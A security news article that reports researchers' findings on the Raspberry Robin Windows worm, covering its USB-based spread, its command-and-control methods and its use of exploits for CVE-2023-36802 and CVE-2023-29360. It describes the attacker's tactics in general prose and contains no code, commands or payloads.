Raspberry Robin Worm Incorporates Two New 1-Day LPE Exploits

February 11, 2024

Raspberry Robin, a Windows worm, was discovered by Red Canary's cybersecurity researchers. The worm spreads through removable USB devices and uses Windows Installer to reach out to domains associated with QNAP and download a malicious DLL. If the primary C2 infrastructure fails, the malware uses TOR exit nodes as a backup.

The worm was first noticed in September 2021, predominantly targeting organizations within the technology and manufacturing sectors. The initial infection usually occurs through infected removable drives, particularly USB devices. The malware employs cmd.exe to read and execute a file stored on the infected external drive, while it uses msiexec.exe to communicate with a rogue domain serving as a C2 to download and install a DLL library file.

Checkpoint researchers have detailed the worm's evolution, noting that the Raspberry Robin authors have integrated two new 1-day LPE zero-day exploits. The researchers believe that the operators either have access to an exploit seller or have developed the exploits themselves. They observed that Raspberry Robin is consistently updated with new features and supports new evasion capabilities.

The malware has also altered its communication method and lateral movement to avoid detection. It is now spreading by disguising itself as a legitimate Windows component. As stated in the report published by Checkpoint, “Since last October, we have seen large waves of attacks against our customers worldwide. Since our last report, it is clear that Raspberry Robin hasn’t stopped implementing new features and tricks that make it even harder to analyze.”

The report also highlights that Raspberry Robin continues to use different exploits for vulnerabilities either before or only a short time after they were publicly disclosed. These 1-day exploits were not publicly disclosed at the time of their use. One of these vulnerabilities, CVE-2023-36802, was also used in the wild as a 0-day and was sold on the Dark Web.

The CVE-2023-36802 vulnerability is a Type Confusion issue in Microsoft Streaming Service Proxy. A local attacker can exploit this flaw to escalate privileges to SYSTEM. This vulnerability was disclosed in September, but researchers reported it had been exploited in the wild for some time before becoming a zero-day. An exploit for this vulnerability was available for sale on Dark Web forums in February 2023, and Raspberry Robin started using it in October 2023.

In addition to CVE-2023-36802, the operators also used an exploit for CVE-2023-29360. The exploit for this vulnerability was publicly disclosed in June, and Raspberry Robin employed it in August. The researchers conclude that Raspberry Robin operators have likely purchased the 1-day exploits from an exploit developer.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.